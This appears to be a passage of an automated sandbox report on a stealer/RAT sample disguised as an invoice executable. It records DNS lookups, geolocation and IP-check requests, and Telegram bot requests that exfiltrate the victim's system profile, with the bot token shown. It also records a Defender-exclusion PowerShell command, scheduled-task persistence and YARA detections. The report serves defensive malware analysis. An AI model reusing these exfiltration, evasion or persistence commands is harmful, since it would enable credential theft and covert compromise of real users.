Dec 31, 2024 14:29:24.509661913 CET	62386	53	192.168.2.4	1.1.1.1
Dec 31, 2024 14:29:24.516813993 CET	53	62386	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 31, 2024 14:29:14.497584105 CET	192.168.2.4	1.1.1.1	0x51b6	Standard query (0)	59.60.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Dec 31, 2024 14:29:14.559030056 CET	192.168.2.4	1.1.1.1	0xf48e	Standard query (0)	icanhazip.com	A (IP address)	IN (0x0001)	false
Dec 31, 2024 14:29:15.077294111 CET	192.168.2.4	1.1.1.1	0x55b0	Standard query (0)	api.mylnikov.org	A (IP address)	IN (0x0001)	false
Dec 31, 2024 14:29:16.772052050 CET	192.168.2.4	1.1.1.1	0x1f9c	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Dec 31, 2024 14:29:24.509661913 CET	192.168.2.4	1.1.1.1	0x4f21	Standard query (0)	59.60.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 31, 2024 14:29:14.504638910 CET	1.1.1.1	192.168.2.4	0x51b6	Name error (3)	59.60.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Dec 31, 2024 14:29:14.565747976 CET	1.1.1.1	192.168.2.4	0xf48e	No error (0)	icanhazip.com		104.16.184.241	A (IP address)	IN (0x0001)	false
Dec 31, 2024 14:29:14.565747976 CET	1.1.1.1	192.168.2.4	0xf48e	No error (0)	icanhazip.com		104.16.185.241	A (IP address)	IN (0x0001)	false
Dec 31, 2024 14:29:15.084583998 CET	1.1.1.1	192.168.2.4	0x55b0	No error (0)	api.mylnikov.org		172.67.196.114	A (IP address)	IN (0x0001)	false
Dec 31, 2024 14:29:15.084583998 CET	1.1.1.1	192.168.2.4	0x55b0	No error (0)	api.mylnikov.org		104.21.44.66	A (IP address)	IN (0x0001)	false
Dec 31, 2024 14:29:16.778772116 CET	1.1.1.1	192.168.2.4	0x1f9c	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Dec 31, 2024 14:29:24.516813993 CET	1.1.1.1	192.168.2.4	0x4f21	Name error (3)	59.60.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

api.mylnikov.org

api.telegram.org

icanhazip.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49740	104.16.184.241	80	7276	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 14:29:14.575835943 CET	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Dec 31, 2024 14:29:15.028290987 CET	535	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 13:29:14 GMT Content-Type: text/plain Content-Length: 13 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=Gk3JvoFwqU7uW7oY8rrsqJL3DKIDON1mUkYA0OpwC1A-1735651754-1.0.1.1-G6U0f6MOpKFhYjfaZD5aVZgQEAw5SA8VpX5D6_.Fn6O8NjqNpAAY1qo1qXzja6XgUBfkqXV5aMRzg5g9h4Wyxg; path=/; expires=Tue, 31-Dec-24 13:59:14 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8faa9e0c9fe60cba-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49746	104.16.184.241	80	7620	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 14:29:24.664386034 CET	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Dec 31, 2024 14:29:25.132405043 CET	535	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 13:29:25 GMT Content-Type: text/plain Content-Length: 13 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=67sVyyLGDMt6v3PHPDOURFKtcwDPEta8XOvB3YBw514-1735651765-1.0.1.1-8ixKnFraY4ONe8RK5plLKSoRvo0Rj4UT.HJ23qVSfD2sSk8asbEHoZ7SEFaHQvUwYl2cEbmhRdTMnIGEPkYolg; path=/; expires=Tue, 31-Dec-24 13:59:25 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8faa9e4bbeba42a6-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a Data Ascii: 8.46.123.189

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49742	172.67.196.114	443	7276	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 13:29:15 UTC	112	OUT	GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1 Host: api.mylnikov.org Connection: Keep-Alive
2024-12-31 13:29:16 UTC	995	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 13:29:16 GMT Content-Type: application/json; charset=utf8 Content-Length: 88 Connection: close Access-Control-Allow-Origin: * Cache-Control: max-age=2678400 CF-Cache-Status: MISS Last-Modified: Tue, 31 Dec 2024 13:29:16 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=103zdon4ZMHx2bnQQM4rxqxC2KlQI2ynPHOV47in9H2VkwOm4YY5KzeZPi4in9pwfWflsXwWHjB1pAru%2F8D22PzV9Q0pJ%2Fyvg7l%2BmDaZGm46ZGk%2B3RawZgkAYpPMQ5P94qUn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 8faa9e10f856c463-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1694&min_rtt=1691&rtt_var=640&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=726&delivery_rate=1701631&cwnd=162&unsent_bytes=0&cid=ce3123e8de726a6b&ts=1214&x=0"
2024-12-31 13:29:16 UTC	88	IN	Data Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 33 35 36 35 31 37 35 36 7d Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1735651756}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49743	149.154.167.220	443	7276	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 13:29:17 UTC	1724	OUT	GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-12-31%208:29:05%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20932923%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20UK7PCEYE%0ARAM:%204095MB%0AHWID:%20EE6ED39488%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.189%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No% [TRUNCATED] Host: api.telegram.org Connection: Keep-Alive
2024-12-31 13:29:17 UTC	347	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Tue, 31 Dec 2024 13:29:17 GMT Content-Type: application/json Content-Length: 137 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-31 13:29:17 UTC	137	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 63 61 6e 27 74 20 70 61 72 73 65 20 65 6e 74 69 74 69 65 73 3a 20 43 61 6e 27 74 20 66 69 6e 64 20 65 6e 64 20 6f 66 20 74 68 65 20 65 6e 74 69 74 79 20 73 74 61 72 74 69 6e 67 20 61 74 20 62 79 74 65 20 6f 66 66 73 65 74 20 39 31 39 22 7d Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: can't parse entities: Can't find end of the entity starting at byte offset 919"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49744	149.154.167.220	443	7276	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 13:29:18 UTC	171	OUT	GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1 Host: api.telegram.org
2024-12-31 13:29:18 UTC	344	IN	HTTP/1.1 403 Forbidden Server: nginx/1.18.0 Date: Tue, 31 Dec 2024 13:29:18 GMT Content-Type: application/json Content-Length: 84 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-31 13:29:18 UTC	84	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 33 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 46 6f 72 62 69 64 64 65 6e 3a 20 62 6f 74 20 77 61 73 20 62 6c 6f 63 6b 65 64 20 62 79 20 74 68 65 20 75 73 65 72 22 7d Data Ascii: {"ok":false,"error_code":403,"description":"Forbidden: bot was blocked by the user"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49747	172.67.196.114	443	7620	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 13:29:25 UTC	112	OUT	GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1 Host: api.mylnikov.org Connection: Keep-Alive
2024-12-31 13:29:25 UTC	999	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 13:29:25 GMT Content-Type: application/json; charset=utf8 Content-Length: 88 Connection: close Access-Control-Allow-Origin: * Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 9 Last-Modified: Tue, 31 Dec 2024 13:29:16 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i6O3C7WWWlc6aD2IFsR30Oiwt9Mg%2FbXULhrLrwrXPpuddkJYfejxbYD1UL8fggcrSgYmtUM3bFU3ArMgbLrlNhoU2oW39neO6tdIChXPqr6xK9R3TgifJyk7y%2Bms603VVQ%2BG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 8faa9e4ffa2f0f97-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1555&min_rtt=1554&rtt_var=584&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=726&delivery_rate=1879021&cwnd=245&unsent_bytes=0&cid=824c3376b99c325a&ts=154&x=0"
2024-12-31 13:29:25 UTC	88	IN	Data Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 33 35 36 35 31 37 35 36 7d Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1735651756}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49748	149.154.167.220	443	7620	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 13:29:26 UTC	1723	OUT	GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-12-31%208:29:15%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20932923%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20UK7PCEYE%0ARAM:%204095MB%0AHWID:%20EE6ED39488%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.189%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No% [TRUNCATED] Host: api.telegram.org Connection: Keep-Alive
2024-12-31 13:29:26 UTC	347	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Tue, 31 Dec 2024 13:29:26 GMT Content-Type: application/json Content-Length: 137 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-31 13:29:26 UTC	137	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 63 61 6e 27 74 20 70 61 72 73 65 20 65 6e 74 69 74 69 65 73 3a 20 43 61 6e 27 74 20 66 69 6e 64 20 65 6e 64 20 6f 66 20 74 68 65 20 65 6e 74 69 74 79 20 73 74 61 72 74 69 6e 67 20 61 74 20 62 79 74 65 20 6f 66 66 73 65 74 20 39 31 38 22 7d Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: can't parse entities: Can't find end of the entity starting at byte offset 918"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49750	149.154.167.220	443	7620	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 13:29:27 UTC	171	OUT	GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1 Host: api.telegram.org
2024-12-31 13:29:27 UTC	344	IN	HTTP/1.1 403 Forbidden Server: nginx/1.18.0 Date: Tue, 31 Dec 2024 13:29:27 GMT Content-Type: application/json Content-Length: 84 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-31 13:29:27 UTC	84	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 33 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 46 6f 72 62 69 64 64 65 6e 3a 20 62 6f 74 20 77 61 73 20 62 6c 6f 63 6b 65 64 20 62 79 20 74 68 65 20 75 73 65 72 22 7d Data Ascii: {"ok":false,"error_code":403,"description":"Forbidden: bot was blocked by the user"}

Target ID:	0
Start time:	08:28:53
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe"
Imagebase:	0x950000
File size:	804'352 bytes
MD5 hash:	54DBE54846A05D5A1677A5AB2970BD6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:29:00
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe"
Imagebase:	0x520000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:29:00
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:29:00
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SFHAWxtoIpgL" /XML "C:\Users\user\AppData\Local\Temp\tmp532A.tmp"
Imagebase:	0x350000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:29:00
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:29:00
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe"
Imagebase:	0xb70000
File size:	804'352 bytes
MD5 hash:	54DBE54846A05D5A1677A5AB2970BD6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000006.00000002.4117062376.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4117062376.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000006.00000002.4117062376.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	08:29:00
Start date:	31/12/2024
Path:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
Imagebase:	0x850000
File size:	804'352 bytes
MD5 hash:	54DBE54846A05D5A1677A5AB2970BD6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 74%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:29:02
Start date:	31/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:29:08
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SFHAWxtoIpgL" /XML "C:\Users\user\AppData\Local\Temp\tmp73B2.tmp"
Imagebase:	0x350000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:29:08
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:29:09
Start date:	31/12/2024
Path:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe"
Imagebase:	0xee0000
File size:	804'352 bytes
MD5 hash:	54DBE54846A05D5A1677A5AB2970BD6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000B.00000002.4114120570.0000000000420000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: 